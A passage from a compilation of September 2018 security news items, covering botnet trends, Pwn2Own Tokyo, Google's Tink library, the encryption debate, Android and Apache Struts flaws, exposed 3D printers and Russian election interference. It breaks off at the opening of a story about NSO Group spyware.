A look at the geography of infection targets reveals that another backdoor, QRAT, has the largest reach. In H2 2017, we registered infection attempts in 190 countries, and this year QRAT added two more countries, bringing the total to 192.

QRAT distribution map, H2 2017 — H1 2018 (download)

This extensive scope is due to the SaaS (Software-as-a-Service), or rather MaaS (Malware-as-a-Service), distribution model QRAT can be purchased for 30 or 90 days, or for one year. Its cross-platform nature (the malware is written in Java) also plays a role.

Conclusion
By intercepting bot commands, we can track the latest trends in the world of virus writers and provide maximum protection for our users.

Here are the main trends that we identified from analyzing files downloaded by bots:

The share of miners in bot-distributed files is increasing, as cybercriminals have begun to view botnets as a tool for mining cryptocurrency.
Backdoors consistently make up the bulk of downloads; that is, botnet operators are keen to gain maximum possible control over infected devices.
The number of downloaded droppers is also on the rise, indicative of attacks that are multistage and growing in complexity.
The share of banking Trojans among bot-downloaded files in 2018 decreased, but it’s too soon to speak of an overall reduction in number, since they are often delivered by droppers (see above).
Increasingly, botnets are leased according to the needs of the customer, and in many cases it is difficult to pinpoint the “specialization” of the botnet.


IoT Category Added to Pwn2Own Hacking Contest
5.9.2018 securityweek  Congress

This year’s mobile-focused Pwn2Own hacking competition organized by Trend Micro’s Zero Day Initiative (ZDI) will include a new category for Internet of Things (IoT) devices.

The event, whose name has been changed from Mobile Pwn2Own to Pwn2Own Tokyo as a result of the expansion, will take place alongside the PacSec security conference in Tokyo, Japan, on November 13 – 14.

Hackers can earn over $500,000 in cash and prizes if they manage to find and exploit vulnerabilities in devices from Google, Apple, Samsung, Huawei, Xiaomi, Amazon and Nest.

In the new IoT category, contestants can earn up to $60,000 if they can execute arbitrary code without user interaction on Apple Watch Series 3, Amazon Echo (2nd generation), Google Home, Nest Cam IQ Indoor and Amazon Cloud Cam devices.

In the web browsers category, security experts can receive a cash prize of $25,000 for hacking the default browser on Huawei P20, Xiaomi Mi6, and Samsung Galaxy S9, and $50,000 for a successful exploit against the browsers running on Apple’s iPhone X, and Google’s Pixel 2.

In the short distance category, which includes Wi-Fi, Bluetooth, and near field communication (NFC), ZDI is offering up to $30,000 and up to $60,000 – exploits targeting devices from Apple and Google are worth the higher amount.

Hacking a device simply by sending it a SMS/MMS message or getting its owner to view a message can earn Pwn2Own Tokyo contestants as much as $75,000.

The highest rewards are offered this year for baseband attacks, which involve the target device communicating with a rogue base station. Researchers can get up to $50,000 for a successful exploit against Huawei, Xiaomi and Samsung devices, and up to $150,000 for hacking Apple and Google phones.

Pwn2Own Tokyo prizes

In the browser and short-range categories, participants can earn an extra $20,000 if their exploit payload is executed with kernel privileges. There is also a persistence bonus for these categories: $50,000 if the exploit survives a reboot on an iPhone X, and $25,000 if it survives a reboot on a Pixel 2.

Registration for Pwn2Own Tokyo closes on November 7 at 5:00 p.m. Japan Standard Time.

At last year’s event, hackers earned more than half a million dollars after successfully demonstrating exploits against the Samsung Galaxy S8, the Apple iPhone 7 and the Huawei Mate 9 Pro. No attempts were made against the Google Pixel.


Google Introduces Open Source Cross-Platform Crypto Library
5.9.2018 securityweek  Crypto

Google last week took the wraps off Tink, an open source, multi-language, cross-platform cryptographic library designed to help simplify common encryption operations.

Under development for the past two years, the cryptographic library has been available on GitHub since its early days and has already attracted a few external contributors.

Now at version 1.2.0 and with support for cloud, Android, iOS, and more, the library is already being used to secure data of Google products such as AdMob, Google Pay, Google Assistant, Firebase, the Android Search App, and others.

Built on top of existing libraries such as BoringSSL and Java Cryptography Architecture, Tink also includes a series of countermeasures that aim at mitigating weaknesses that Google’s Project Wycheproof discovered in those libraries.

Tink can simplify many common cryptographic operations. Data encryption, digital signatures, and more would only require a few lines of code, the Internet giant claims.

The library is providing cryptographic APIs that Google says are secure, as well as easy to use correctly, but harder to misuse.

“Tink aims to eliminate as many potential misuses as possible. For example, if the underlying encryption mode requires nonces and nonce reuse makes it insecure, then Tink does not allow the user to pass nonces,” Google explains.

The goal when building the library was to make it easy to improve product security. Thus, Tink shows the claimed security properties right in the interfaces, so that both security auditors and automated tools can quickly find instances where the security guarantees don’t match the security requirements.

Furthermore, the library isolates APIs for potentially dangerous operations, thus enabling the discovery, restriction, monitoring, and logging of these APIs’ usage.

Support for key management was also included in the library, including key rotation and phasing out deprecated ciphers, Google says.

Also designed to be extensible, Tink simplifies the addition of custom cryptographic schemes or in-house key management systems. All of Tink’s components are easy to replace or remove, all “are composable, and can be selected and assembled in various combinations,” Google says.

This means that anyone who only needs digital signatures, for example, can simply exclude symmetric key encryption components from the library, thus minimizing code size in their application.


'Five Eyes' Agencies Demand Reignites Encryption Debate
5.9.2018 securityweek  BigBrothers

Privacy and human rights organizations expressed concern Tuesday after a coalition of intelligence agencies renewed a call for technology companies to allow so-called "backdoor" access to encrypted content and devices.

The reaction came following a weekend statement from the "Five Eyes" intelligence agencies calling on "industry partners" to provide a way for law enforcement to access encrypted content that may not be available even with a search warrant.

The call by the agencies from the United States, Britain, Canada, Australia and New Zealand threatens to reignite a long-simmering debate on encryption.

"Many of the same means of encryption that are being used to protect personal, commercial and government information are also being used by criminals, including child sex offenders, terrorists and organized crime groups to frustrate investigations and avoid detection and prosecution," said the statement from the five countries issued by Australia's Department of Home Affairs.

Without voluntary cooperation, the agencies said, "we may pursue technological, enforcement, legislative or other measures to achieve lawful access solutions."

While some law enforcement agencies contend that encryption is being used to shield criminal activity, tech firms and privacy activists argue that any weakening of encryption would harm security for all users.

"The risk is that these countries will compel providers to build a backdoor that not only governments will exploit but hackers, criminals and other bad guys will use as well," said Greg Nojeim of the Washington-based Center for Democracy & Technology.

"It would weaken cybersecurity at the same time governments are preaching that cybersecurity needs to be addressed."

Marc Rotenberg, president of the Electronic Privacy Information Center, called the latest effort "a short-sighted and counterproductive proposal" and added that "it has become clear that encryption is vital for both privacy and public safety."

Similar concerns were voiced by Amnesty International, which said in a tweet, "This won't make us safer -- it will just weaken security for everyone."

Debate on 'going dark'

Encryption has been a hot-button issue in the United States for years, and came to a head in 2016 when Apple challenged the FBI's request to create software that would enable investigators to access an iPhone used by an attacker in a 2015 mass shooting in San Bernardino, California.

The US government eventually dropped its demand after finding another means to access the device, but a number of law enforcement officials have complained that they are "going dark" with the use of encrypted apps and devices that cannot be accessed by traditional wiretaps.

Nojeim said the claim of "going dark" is vastly exaggerated.

"There has never been more electronic information available to assist criminal and intelligence investigations," he said.

"We leave a digital footprint with virtually everything we do online and most of those footprints can be collected without the hindrance of encryption."

But James Lewis of the Center for Strategic and International Studies, who supports better law enforcement access, said tech firms may face more pressure than in the past.

"It's part of the bigger public move to rein in the tech companies and make them more socially responsible," Lewis said. "The old laissez-faire arguments are losing ground."


Android System Broadcasts Expose Device Information
5.9.2018 securityweek  Android

Android device details are being exposed to running applications via Wi-Fi broadcasts in the mobile operating system, Nightwatch Cybersecurity has discovered.

The exposed information includes the WiFi network name, BSSID, local IP addresses, DNS server information, and the MAC address. Normally, extra permissions are required to access such details, but Wi-Fi broadcasts allow all applications to capture the information, thus bypassing existing mitigations.

Furthermore, Nightwatch Cybersecurity’s researchers argue that the MAC address, which is tied to the hardware, can be used to “uniquely identify and track any Android device.” Information such as network name and BSSID allow for the geolocation of users, while other information can be leveraged for other attacks.

Tracked as CVE-2018-9489, the vulnerability was addressed in the recently released Android 9, but previous platform iterations continue to be impacted, ths security firm says. Thus, all devices running under those OS versions, including forks such as Amazon’s FireOS for the Kindle, are believed to be vulnerable.

The issue, the security researchers say, is that application developers neglect to implement restrictions or mask sensitive data when it comes to the use of “Intents” in their applications. These Intents are system-wide messages that both apps and the OS can send, and which other applications can listen to.

The Android platform, the security researchers explain, regularly broadcasts information about the WiFi connection and the WiFi network interface and uses WifiManager’s NETWORK_STATE_CHANGED_ACTION and WifiP2pManager’s WIFI_P2P_THIS_DEVICE_CHANGED_ACTION Intents for that.

“This information includes the MAC address of the device, the BSSID and network name of the WiFi access point, and various networking information such as the local IP range, gateway IP and DNS server addresses. This information is available to all applications running on the user’s device,” the researchers note.

Applications looking to access the information via the WifiManager would normally require the “ACCESS_WIFI_STATE” permission in the application manifest. Apps looking to access geolocation via WiFi require the “ACCESS_FINE_LOCATION” or “ACCESS_COARSE_LOCATION” permissions.

Applications listening for system broadcasts, however, don’t need these permissions and can capture the details without user’s knowledge. They can even capture the real MAC address, although it is no longer available via APIs on Android 6 or higher.

“We performed testing using a test farm of mobile device ranging across multiple types of hardware and Android versions. All devices and versions of Android tested confirmed this behavior, although some devices do not display the real MAC address in the “NETWORK_STATE_CHANGED_ACTION” intent but they still do within the “WIFI_P2P_THIS_DEVICE_CHANGED_ACTION” intent,” the researchers said.

Given that Google addressed the issue in Android 9 only, users are encouraged to upgrade to this platform iteration to ensure they remain protected.


GOBLIN PANDA Targets Vietnam Again
5.9.2018 securityweek 
Virus

CrowdStrike security researchers have observed renewed activity associated with GOBLIN PANDA, a threat actor mainly targeting entities in Southeast Asia.

First observed in 2013 and highly active in 2014, when a conflict over territory in the South China Sea was generating high tension, GOBLIN PANDA is known to focus on Vietnam. Also referred to as Cycldek, the actor has been primarily targeting entities in the defense, energy, and government sectors.

Last month, the group was observed targeting Vietnam once again, as part of a campaign that employed exploit documents featuring Vietnamese-language lures and themes. The adversary-controlled infrastructure leveraged as part of the attacks was Vietnam-themed as well.

The security researchers observed two exploit documents with Vietnamese-language file names that packed metadata unique to the GOBLIN PANDA adversary. When opened, the files display Microsoft Office Word documents with training-related themes as decoys.

“These documents did not specifically reference Vietnamese government projects or departments, however they could still be directed towards Government of Vietnam personnel,” CrowdStrike says.

These documents attempt to exploit an old Office vulnerability, namely CVE-2012-0158. The exploit code would drop the side-loading malware implant tracked as QCRat onto the compromised machine.

The documents, CrowdStrike discovered, use a “previously identified legitimate executable, and a side-loading implant Dynamic Link Library (DLL), as well as new implant configuration files stored as a .tlb file.”

While analyzing the command and control infrastructure associated with the campaign, the security researchers discovered indicators that the threat actor might be targeting entities in Laos as well. However, no attacks have been observed and CrowdStrike says it cannot confirm targets in Laos for this campaign, although GOBLIN PANDA has targeted this country before.

“Given major economic initiatives by China, such as the Belt and Road Initiative and continued dispute over the Paracel Islands, it is unlikely that GOBLIN PANDA will abandon efforts to collect intelligence from South East Asian neighbors and businesses operating in that region,” CrowdStrike concludes.


Facebook Chief Says Internet Firms in 'Arms Race' for Democracy
5.9.2018 securityweek 
Social

Facebook chief Mark Zuckerberg said late Tuesday that the leading social network and other internet firms are in an arms race to defend democracy.

Zuckerberg's Washington Post op-ed came on the eve of hearings during which lawmakers are expected to grill top executives from Facebook and Twitter.

Google's potential participation is unclear.

The hearings come with online firms facing intense scrutiny for allowing the propagation of misinformation and hate speech, and amid allegations of political bias from the president and his allies.

"Companies such as Facebook face sophisticated, well-funded adversaries who are getting smarter over time, too," Zuckerberg said in an op-ed piece outlining progress being made on the front by the leading social network.

"It's an arms race, and it will take the combined forces of the US private and public sectors to protect America's democracy from outside interference."

After days of vitriol from President Donald Trump, big Silicon Valley firms face lawmakers with a chance to burnish their image -- or face a fresh bashing.

Twitter chief executive Jack Dorsey and Facebook chief operating officer Sheryl Sandberg were set to appear at a Senate Intelligence Committee hearing on Wednesday.

Lawmakers were seeking a top executive from Google or its parent Alphabet, but it remained unclear if the search giant would be represented.

Sources familiar with the matter said Google offered chief legal officer Kent Walker, who the company said is most knowledgeable on foreign interference, but that senators had asked for the participation of CEO Sundar Pichai or Alphabet CEO Larry Page.

Dorsey testifies later in the day at a hearing of the House Energy and Commerce Committee on online "transparency and accountability."

The tech giants are likely to face a cool reception at best from members of Congress, said Roslyn Layton, an American Enterprise Institute visiting scholar specializing in telecom and internet issues.

"The Democrats are upset about the spread of misinformation in the 2016 election, and the Republicans over the perception of bias," Layton said.

"They are equally angry, but for different reasons."

Kathleen Hall Jamieson, a University of Pennsylvania professor and author of an upcoming book on Russia's role in election hacking, said the hearings could give the companies a platform to explain how they operate.

"Hearings are an opportunity as well as a liability," she said.

"These companies have put in place fixes (on foreign manipulation) but they have done it incrementally, and they have not communicated that to a national audience."


Hackers can easily access 3D printers exposed online for sabotage and espionage
5.9.2018 securityaffairs CyberSpy

Security researchers at the SANS Internet Storm Center discovered that thousands of 3D printers are exposed online without proper defense.
The news is worrisome, thousands of 3D printers are exposed online to remote cyber attacks. According to the experts at SANS Internet Storm Center that scanned the internet for vulnerable 3D printers, a Shodan query has found more than 3,700 instances of OctoPrint interfaces exposed online, most in the United States (1,600).

The OctoPrint is a free and open source web interface for 3D printers that could be used to remotely monitor and control the devices.

Exposed 3D printers

Users can control print jobs through the interface, unauthorized accesses could be used for malicious activities, including sabotage and cyber espionage.

“So, what can go wrong with this kind of interface? It’s just another unauthenticated access to an online device. Sure but the printer owners could face very bad situations.” reads the analysis published by the experts.

“The interface allows downloading the 3D objects loaded in the printer. Those objects are in G-code format[2]. To make it simple, G-code is a language in which people tell computerized machine tools how to make something. G-code files are simple text files and are not encrypted:”

Experts warn that G-code files can be downloaded and manipulated by attackers for sabotage or and lead to potentially trade secret data leak.

“Indeed, many companies R&D departments are using 3D printers to develop and test some pieces of their future product.” continues the experts.

3D printers interface

3D printers interface“Worse, what if the attacker downloads a G-code file, alters it and re-upload it. Be changing the G-code instructions, you will instruct the device to print the object but the altered one won’t have the same physical capabilities and could be a potential danger once used.” concludes the experts.

“Think about 3D-printer guns[4] but also 3D-printed objects used in drones. Drone owners are big fans of self-printed hardware.”

Experts highlighted that 3D printers could be also used to start a fire given the high temperatures during printing operations. Attackers can also abuse the monitoring feature that uses an embedded webcam can be accessed remotely.

The OctoPrint development team recommends enabling the Access Control feature to avoid that anyone can remotely gain full control over the printer and urges the implementation of additional measures to secure the 3D printers if remote access is required.

“If you plan to have your OctoPrint instance accessible over the internet, always enable Access Control and ideally don’t make it accessible to everyone over the internet but instead use a VPN or at the very least HTTP basic authentication on a layer above OctoPrint,” states the OctoPrint documentation.


Thousands of 3D Printers Exposed to Remote Attacks
4.9.2018 securityweek  Attack

Malicious actors could take control of thousands of 3D printers that can be accessed directly from the Internet without requiring any authentication.

According to the SANS Internet Storm Center, a Shodan search reveals over 3,700 instances of OctoPrint interfaces exposed to the Web, including nearly 1,600 in the United States.

Exposed 3D printers

OctoPrint is a free and open source web interface for 3D printers that allows users to monitor and control every aspect of their device and printing jobs. OctoPrint can be used to start, stop or pause a print job, it provides access to the printer’s embedded webcam, it supplies information on the progress of a print job, and monitors the temperature of key components.

While it may seem that failure to protect a 3D printer against unauthorized access cannot pose a major risk, SANS’s Xavier Mertens warns that an attacker can conduct a wide range of malicious activities.

For instance, they can access G-code files, which are text files that contain the instructions needed to print a 3D object. In the case of organizations, these files could store valuable trade secrets.

“Indeed, many companies’ R&D departments are using 3D printers to develop and test some pieces of their future product,” Mertens noted.

The researcher pointed out that an attacker could also upload specially crafted G-code files to an unprotected printer. They could instruct the device to start printing when nobody is around, or they could make small changes to the code.

“By changing the G-code instructions, you will instruct the device to print the object but the altered one won’t have the same physical capabilities and could be a potential danger once used,” Mertens explained. “Think about 3D-printed guns but also 3D-printed objects used in drones. Drone owners are big fans of self-printed hardware.”

3D printers have been known to catch fire and it’s not implausible that an attacker may be able to intentionally start a fire given the high temperatures during operation of the system.

Finally, an attacker could be able to spy on the vulnerable printer’s owner through the embedded webcam.

These attacks are possible not due to some serious vulnerabilities in OctoPrint, but due to the failure of users to securely configure their devices.

OctoPrint developers advise users to enable the Access Control feature and take additional steps to secure the device if remote access is required. If Access Control is disabled, anyone can remotely gain full control over the printer.

“If you plan to have your OctoPrint instance accessible over the internet, always enable Access Control and ideally don’t make it accessible to everyone over the internet but instead use a VPN or at the very least HTTP basic authentication on a layer above OctoPrint,” OctoPrint documentation reads. “A physical device that includes heaters and stepper motors really should not be publicly reachable by everyone with an internet connection, even with access control enabled.”


Google Fights Tech Support Scams With New Ad Restrictions
4.9.2018 securityweek 
Spam

Google announced late last week that it’s preparing a new verification program designed to keep tech support scams off its advertising platform.

Tech support scams still represent a major issue and while these types of schemes are often unsophisticated, fraudsters have been known to use some creative methods to achieve their goals.

Tech support scammers can lure their victims through online ads, and Google’s advertising platform has been increasingly abused for this purpose. That is why the tech giant has decided to introduce some restrictions for tech support services.

“We’ve seen a rise in misleading ad experiences stemming from third-party technical support providers and have decided to begin restricting ads in this category globally,” said David Graff, director of Global Product Policy at Google.

“As the fraudulent activity takes place off our platform, it’s increasingly difficult to separate the bad actors from the legitimate providers. That’s why in the coming months, we will roll out a verification program to ensure that only legitimate providers of third-party tech support can use our platform to reach consumers,” Graff explained.

While Google is aware that the introduction of the new verification program will not block all attempts to “game” its advertising systems, the company is confident that it will at least make it “a lot harder.”

Google previously banned ads for bail bonds services and payday loans, and introduced verification programs for locksmith services and addiction treatment centers.

The company said it had paid out $12.6 billion to publishing partners in its ad network last year. On the other hand, it removed 320,000 publishers, and blacklisted roughly 90,000 websites and 700,000 mobile applications.

Google also said it took down 3.2 billion ads that violated its policies in 2017, which represents roughly 100 bad ads per second.

“We blocked 79 million ads in our network for attempting to send people to malware-laden sites, and removed 400,000 of these unsafe sites last year. And, we removed 66 million ‘trick-to-click’ ads as well as 48 million ads that were attempting to get users to install unwanted software,” the company said in its report for 2017.


Oracle Products Affected by Exploited Apache Struts Flaw
4.9.2018 securityweek 
Exploit

Oracle informed customers over the weekend that some of the company’s products are affected by a critical Apache Struts 2 vulnerability that has been exploited in the wild.

The vulnerability, discovered in the open source development framework by Semmle researcher Man Yue Mo, is tracked as CVE-2018-11776 and it has been classified as critical. It allows an unauthenticated attacker to remotely execute arbitrary code on a targeted server by sending it a specially crafted request.

The existence of the flaw was disclosed on August 22, and despite the availability of only limited technical information, proof-of-concept (PoC) exploits emerged within days.

On around August 27, security firms started seeing attempts to find vulnerable Apache Struts 2 installations, and even attempts to exploit the security hole to deliver a cryptocurrency miner.

Oracle notified customers of CVE-2018-11776 on Saturday and warned that Apache Struts 2 is a component of several of its product distributions. However, the company noted that not all products incorporating Struts 2 are necessarily vulnerable.

“When the alwaysSelectFullNamespace option is enabled in a Struts 2 configuration file, and an ACTION tag is specified without a namespace attribute or a wildcard namespace, this vulnerability can be used to perform an unauthenticated remote code execution attack which can lead to a complete compromise of the targeted system,” Oracle said in its advisory.

The exact list of products impacted by the vulnerability is only available to Oracle customers, but the company revealed last year – when it warned users about another actively exploited Struts 2 flaw – that the framework is used in MySQL Enterprise Monitor, Communications Policy Management, FLEXCUBE Private Banking, Retail XBRi, Siebel, WebLogic Server, and various Financial Services and Insurance products.

Customers have been provided information on the status of each impacted product and the availability of patches. Oracle’s next Critical Patch Update (CPU) is scheduled for October 16.

Apache Struts vulnerabilities can pose a significant risk to organizations. A flaw affecting the framework was exploited in the massive Equifax breach that impacted over 140 million individuals.


Twitter to Verify Those Behind Hot-button US Issue Ads
4.9.2018 securityweek 
Social

Twitter on Thursday started requiring those behind hot-button issue ads in the US to be vetted as part of the effort by the social network to thwart stealth campaigns aimed at influencing politics.

The tightened ad policy included requiring photos and valid contact information, and prohibited state-owned media or national authorities from buying political ads to be shown on Twitter outside their home countries.

Those placing these Twitter ads will need to be "certified" by the company and meet certain guidelines, and the ads will be labeled as political "issue" messages.

"The intention of this policy is to provide the public with greater transparency into ads that seek to influence people's stance on issues that may influence election outcomes," Twitter executives Del Harvey and Bruce Falck said in a blog post.

The new ad policy came as major technology firms including Facebook, Google and Twitter battle against misinformation campaigns by foreign agents.

Facebook, Twitter, Google and Microsoft recently blocked accounts from Russian and Iranian entities which the companies said were propagating misinformation aimed at disrupting the November US elections.

The new ad policy at Twitter applies to paid messages that identify political candidates or advocate regarding legislative issues of national importance.

Examples of issue topics provided by Twitter included abortion, civil rights, climate change, guns, healthcare, immigration, national security, social security, taxes and trade.

The policy did not apply to news agencies reporting on candidates or issues, rather than advocating outcomes, according to Harvey and Falck.

Silicon Valley executives are set to take part in a September 5 Senate hearing about foreign efforts to use social media platforms to influence elections.


Will Russian Hackers Affect This Year's US Election?
4.9.2018 securityweek  BigBrothers

Nearly a year after Russian government hackers meddled in the 2016 U.S. election, researchers at cybersecurity firm Trend Micro zeroed in on a new sign of trouble: a group of suspect websites.

The sites mimicked a portal used by U.S. senators and their staffs, with easy-to-miss discrepancies. Emails to Senate users urged them to reset their passwords — an apparent attempt to steal them.

Once again, hackers on the outside of the American political system were probing for a way in.

"Their attack methods continue to take advantage of human nature and when you get into an election cycle the targets are very public," said Mark Nunnikhoven, vice president of cloud research at Trend Micro.

Now the U.S. has entered a new election cycle. And the attempt to infiltrate the Senate network, linked to hackers aligned with Russia and brought to public attention in July, is a reminder of the risks, and the difficulty of assessing them.

Newly reported attempts at infiltration and social media manipulation — which Moscow officially denies — point to Russia's continued interest in meddling in U.S. politics. There is no clear evidence, experts said, of efforts by the Kremlin specifically designed to disrupt elections in November. But it wouldn't take much to cause turmoil.

"It's not a question of whether somebody is going to try to breach the system, to manipulate the system, to influence the system," said Robby Mook, who managed Hillary Clinton's presidential campaign and co-directs a Harvard University project to protect democracy from cyberattacks, in an interview earlier this year. "The question is: Are we prepared for it?"

Online targeting of the U.S. political system has come on three fronts — efforts to get inside political campaigns and institutions and expose damaging information; probes of electoral systems, potentially to alter voter data and results; and fake ads and accounts on social media used to spread disinformation and fan divisions among Americans.

In recent weeks, Microsoft reported that it had disabled six Russian-launched websites masquerading as U.S. think tanks and Senate sites. Facebook and the security firm FireEye revealed influence campaigns, originating in Iran and Russia, that led the social network to remove 652 impostor accounts, some targeted at Americans. The office of Republican Sen. Pat Toomey of Pennsylvania said hackers tied to a "nation-state" had sent phishing emails to old campaign email accounts.

U.S. officials said they have not detected any attempts to corrupt election systems or leak information rivaling Kremlin hacking before President Donald Trump's surprise 2016 victory.

Still, "we fully realize that we are just one click away of the keyboard from a similar situation repeating itself," Dan Coats, the director of national intelligence, said in July.

Michael McFaul, the architect of the Obama administration's Russia policy, has said he believes Russian President Vladimir Putin perceives little benefit in a major disruption effort this year, preferring to keep his powder dry for the 2020 presidential contest.

But even if the upcoming elections escape disruption, that hardly means the U.S. is in the clear.

Trump's decision in May to eliminate the post of White House cybersecurity coordinator confirmed his lack of interest in countering Russian meddling, critics say. Congress has not delivered any legislation to combat election interference or disinformation. Last week, a review of the bipartisan "Secure Elections Act" was canceled after Republican leaders registered objections, congressional staffers said.

The risks extend beyond the midterms.

"The biggest question is going to be how are you going to make sure that people actually trust the results, because democracy relies on credibility," said Ben Nimmo, a researcher at the Atlantic Council. "It's not over after November."

Experts said it is too late to safeguard U.S. voting systems and campaigns this election cycle. But with two months to go, there is time enough to take stock of the Russian-sponsored interference that has come to light so far — and to assess the risks of what we don't know.

In mid-2016, hackers found a way into the voter registration database at the Illinois State Board of Elections and spent three weeks poking around. After the breach was discovered, officials said the infiltrators had downloaded the records of up to 90,000 voters.

It's not clear that anything nefarious was done with those records. But when special counsel Robert Mueller charged a dozen Russian intelligence agents with hacking this July, the indictment clarified the potential for damage. The hackers had, in fact, stolen information on 500,000 voters, including dates of birth and partial Social Security numbers.

"The internet allows foreign adversaries to attack Americans in new and unexpected ways," Deputy Attorney General Rod Rosenstein said, in announcing the indictments.

The Illinois hack is the most notable case of foreign tampering with U.S. election systems to come to light. There has been no evidence of efforts to change voter information or tamper with voting machines, though experts caution hackers might have planted unseen malware in far-flung election systems that could be triggered later.

Potential problems are not limited to Illinois.

A week before the 2016 general election, Russian intelligence agents sent spear-phishing emails to 122 local elections officials who were customers of VR Systems, a Tallahassee, Florida-based election software vendor.

In addition to Illinois, at least 20 other state systems were probed by the same Russian military unit that targeted VR's customers, federal officials said.

"My unofficial opinion is that we're kind of fooling ourselves if we don't think that they tried to at least make a pass at all 50 states," said Christopher Krebs, the undersecretary for critical infrastructure at DHS.

In June 2017, the federal Election Assistance Commission informed dozens of local voting officials that hackers had attempted to penetrate the systems of a voting system manufacturer, presumed by many to be VR.

"Attempts have been made to obtain voting equipment, security information and in general to probe for vulnerabilities," the EAC wrote officials. Despite those concerns, federal officials have moved slowly to share intelligence with officials who supervise elections. As of mid-August, 92 state officials had been given clearances.

Much of the machinery used to collect and tabulate votes is antiquated, built by a handful of unregulated and secretive vendors, with outdated software that makes them highly vulnerable to attacks, researchers said.

"If someone was able to compromise even a handful of voting machines I think that would be sufficient to cause people to not trust the system," said Sherri Ramsay, a former National Security Agency senior executive.

This spring, a website used by Knox County, Tennessee, officials to display election-night results was knocked offline by an unidentified perpetrator. While the attack was little noticed, it would not be hard to replicate, experts said. Combined with a social media campaign alleging vote tampering, such mischief could cast a shadow over an election, they said.

Election officials have been sandboxing such scenarios for weeks as they prepare for November's balloting.

There's already a Russian playbook for thwarting an election: In Ukraine in 2014, the presidential contest was disrupted by a virus that scrambled election-management software, followed by a media disinformation campaign claiming a pro-Moscow candidate had won.

Democratic Sen. Claire McCaskill of Missouri is plenty busy this fall as she seeks re-election in a state that voted overwhelmingly for Trump. So when an attempt by Russian hackers to infiltrate her campaign came to light in July, she acknowledged it only briefly.

"While this attack was not successful, it is outrageous that they think they can get away with this," McCaskill said. "I will not be intimidated. I've said it before and I will say it again, Putin is a thug and a bully."

The failed hack, which included an attempt to steal the password of at least one McCaskill staffer through a fake Senate login website identified by Microsoft, is the most notable instance of attempted campaign meddling by Russia made public this year.

Microsoft executives said recently that the company had detected attempts by Russia's GRU military intelligence agency to hack two senators. One was presumably McCaskill, but the others have not been identified.

The group behind that attempt, Fancy Bear, is the same one indicted July 13 and identified by Microsoft as the creator of fake websites targeting the Hudson Institute and the International Republican Institute, frequent critics of the Kremlin. Since the summer of 2017, Fancy Bear has aggressively targeted political groups, universities, law enforcement agencies and anti-corruption nonprofits in the U.S. and elsewhere, according to TrendMicro.

"Russian hackers appear to be broadening their target set, but I think tying it to the midterm elections is pure speculation at this point," said Michael Connell , an analyst at the federally funded Center for Naval Analyses in Arlington, Virginia.

There have been other recent reports of U.S. congressional campaign websites targeted by hackers, but that doesn't mean Russian agents are to blame. Experts said most are likely run-of-the-mill criminal cyberattacks seeking financial gain rather than political change.

But Eric Rosenbach, who served as assistant secretary of defense for global security during President Barack Obama's administration and is now at Harvard, said the limited examples of Russian intrusion that have come to light may be only a tip to more significant, still hidden schemes.

"There probably have already been compromises of important campaigns in places where it could sway the outcome or undermine trust in the election," Rosenbach said. "We might not see that until the very last moment."

The risk is magnified by poor efforts to protect many campaign sites, said Josh Franklin, until last month the lead National Institutes of Standards and Technology researcher on voting systems security.

Nearly a third of the 527 House of Representatives campaigns examined by Franklin and fellow researchers had such poor cybersecurity they were graded worse than failing.

"We couldn't go any further with our scan," he said. "We were told that we would be in danger of being sued by the candidate campaigns."

By the time a group called "ReSisters" began organizing a rally against white nationalism for Aug. 10, it had spent more than a year sharing left-wing posts about feminism, immigration and other hot-button topics.

"Confront + Resist Fascism," the group urged on a Facebook event page for its "No Unite the Right 2" protest in Washington, D.C. Like-minded Facebook users posted information about transportation, materials and location so those interested could attend.

In late July, Facebook short-circuited the effort, shutting down the pages and accounts of ReSisters and 31 others. Despite appearing to speak for Americans, the company said, the accounts were planted by unidentified outsiders to fuel divisions among U.S. voters. Researchers at the Atlantic Council who examined the accounts said they acted in ways echoing Russian troll operations before the 2016 election, pointing to English on the pages speckled with grammatical mistakes typical of native Russian speakers.

"We face determined, well-funded adversaries who will never give up and are constantly changing tactics," Facebook said. The outing of the sites is a reminder as November approaches that Russians and other foreign actors continue to use social media to try to influence U.S. politics.

Since the 2016 election, officials and researchers have learned much more about such infiltration. The May release by House Democrats of more than 3,500 ads placed on Facebook by Russian agents from 2015 to 2017 revealed a deliberate campaign to inflame racial divisions in the U.S. Facebook and other tech companies say they are working hard to combat such behavior. But it is not nearly enough, experts said.

The companies must be forced to act faster against Russian and other disinformation campaigns and be made more accountable , said Dipayan Ghosh, a fellow at Harvard's Kennedy School of Government who has worked at both the White House and Facebook on tech policy including social media manipulation.

Ghosh said quantifying Russian disinformation on social media is difficult because they "are operating behind a commercial veil" of for-profit networks that are not subject to public scrutiny.

"The industry is currently accountable to nobody," Ghosh said.

After Facebook was criticized for allowing a data-mining firm to collect information about millions of its users, CEO Mark Zuckerberg said he was open to regulation. But the "Honest Ads Act," which would require online political ads to be identified as they are in traditional media, has stalled in Congress.

The bill's sponsors include the late John McCain and Sen. Mark Warner, the Virginia Democrat who has pressed Facebook for change since the 2016 elections. Executives from Facebook, Twitter and Google are expected to testify before Warner and other members of the Senate Intelligence Committee this week.

Experts said they are uncertain of the effectiveness of Russian disinformation, complicating assessment of the threat it might now pose.

In 2016, Russian actors likely did the greatest damage by hacking and leaking emails from Hillary Clinton's campaign and Democrats' national organization, which were widely reported by the news media. But comparatively few American voters saw individual pieces of misinformation on social media, making it unlikely that it swayed votes , said Brendan Nyhan, a University of Michigan political scientist who has analyzed the scope and impact of the Russian operations.

"There's still too much simplistic thinking about all-powerful propaganda that doesn't correspond to what we know from social science about how hard it is to change people's minds. I'm more concerned about the threat of intensifying polarization and calling the legitimacy of elections into question than I am about massive swings in vote choice," he said.

Still, it is clear that Russian intelligence views its efforts as successful and their example has already stirred others, like Iran, to try similar strategies. Such efforts are bent on coloring U.S. politics even if they are not tied to a specific election, said Lee Foster, FireEye's manager of information operations analysis.

"Where do you draw the line between efforts to influence the election or an election or efforts to influence U.S. domestic politics in general?" Foster said. "We can't just think in the context of the next election. It's not like this goes away after the midterms."


Lawsuit Lays Bare Israel-made Hack Tools in Mideast, Mexico
4.9.2018 securityweek  CyberSpy

PARIS (AP) — One day late last year, Qatari newspaper editor Abdullah Al-Athbah came home, removed the SIM card from his iPhone 7 and smashed it to pieces with a hammer.

A source had just handed Al-Athbah a cache of emails suggesting that his phone had been targeted by hacking software made by Israel's NSO Group. He told The Associated Press he considered the phone compromised.

"I feared that someone could get back into it," he said in an interview Friday. "I needed to protect my sources."

